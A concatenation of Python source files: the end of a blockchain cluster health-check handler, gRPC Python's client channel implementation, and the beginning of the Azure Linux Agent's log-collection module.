Check if the peer is healthy by counting its neighbour number
:param cluster_id: id of the cluster
:param timeout: how many seconds to wait for receiving response
:return: True or False
"""
cluster = self.get_by_id(cluster_id)
logger.debug("checking health of cluster={}".format(cluster))
if not cluster:
logger.warning("Cannot found cluster id={}".format(cluster_id))
return True
if cluster.get('status') != 'running':
logger.warning("cluster is not running id={}".format(cluster_id))
return True
if cluster.get('network_type') == NETWORK_TYPE_FABRIC_PRE_V1:
rest_api = cluster["service_url"]['rest'] + "/network/peers"
if not rest_api.startswith('http'):
rest_api = 'http://' + rest_api
try:
r = requests.get(rest_api, timeout=timeout)
except Exception as e:
logger.error("Error to refresh health of cluster {}: {}".
format(cluster_id, e))
return True
peers = r.json().get("peers")
if len(peers) == cluster["size"]:
self.db_update_one({"id": cluster_id},
{"$set": {"health": "OK"}})
return True
else:
logger.debug("checking result of cluster id={}".format(
cluster_id, peers))
self.db_update_one({"id": cluster_id},
{"$set": {"health": "FAIL"}})
return False
elif cluster.get('network_type') == NETWORK_TYPE_FABRIC_V1:
# TODO: check fabric 1.0 network health status
return True
return True
def db_update_one(self, filter, operations, after=True, col="active"):
"""
Update the data into the active db
:param filter: Which instance to update, e.g., {"id": "xxx"}
:param operations: data to update to db, e.g., {"$set": {}}
:param after: return AFTER or BEFORE
:param col: collection to operate on
:return: The updated host json dict
"""
if after:
return_type = ReturnDocument.AFTER
else:
return_type = ReturnDocument.BEFORE
if col == "active":
doc = self.col_active.find_one_and_update(
filter, operations, return_document=return_type)
else:
doc = self.col_released.find_one_and_update(
filter, operations, return_document=return_type)
return self._serialize(doc)
cluster_handler = ClusterHandler()
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials,
wait_for_ready):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
operationses, event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _moot(state):
with state.lock:
del state.callbacks_and_connectivities[:]
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _options(options):
return list(options) + [
(
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),
]
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _options(options), credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _close(self):
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
_moot(self._connectivity_state)
def _close_on_fork(self):
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
_moot(self._connectivity_state)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
# has passed for all users to be trusted to hang out to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
if cygrpc is not None: # Globals may have already been collected.
cygrpc.fork_unregister_channel(self)
# This prevent the failed-at-initializing object removal from failing.
# Though the __init__ failed, the removal will still trigger __del__.
if _moot is not None and hasattr(self, '_connectivity_state'):
_moot(self._connectivity_state)
|
collect_logs.py
|
# Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import os
import sys
import threading
import time
import azurelinuxagent.common.conf as conf
from azurelinuxagent.common import logger
from azurelinuxagent.common.cgroupapi import CGroupsApi
from azurelinuxagent.common.event import elapsed_milliseconds, add_event, WALAEventOperation
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.logcollector import COMPRESSED_ARCHIVE_PATH
from azurelinuxagent.common.protocol.util import get_protocol_util
from azurelinuxagent.common.utils import shellutil
from azurelinuxagent.common.utils.shellutil import CommandError
from azurelinuxagent.common.version import PY_VERSION_MAJOR, PY_VERSION_MINOR, AGENT_NAME, CURRENT_VERSION
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_logs_handler():
return CollectLogsHandler()
def is_log_collection_allowed():
# There are three conditions that need to be met in order to allow periodic log collection:
# 1) It should be enabled in the configuration.
# 2) The system must be using systemd to manage services. Needed for resource limiting of the log collection.
# 3) The python version must be greater than 2.6 in order to support the ZipFile library used when collecting.
conf_enabled = conf.get_collect_logs()
systemd_present = CGroupsApi.is_systemd()
supported_python = PY_VERSION_MINOR >= 7 if PY_VERSION_MAJOR == 2 else PY_VERSION_MAJOR == 3
is_allowed = conf_enabled and systemd_present and supported_python
msg = "Checking if log collection is allowed at this time [{0}]. All three conditions must be met: " \
"configuration enabled [{1}], systemd present [{2}], python supported: [{3}]".format(is_allowed,
conf_enabled,
systemd_present,
supported_python)
logger.info(msg)
add_event(
name=AGENT_NAME,
version=CURRENT_VERSION,
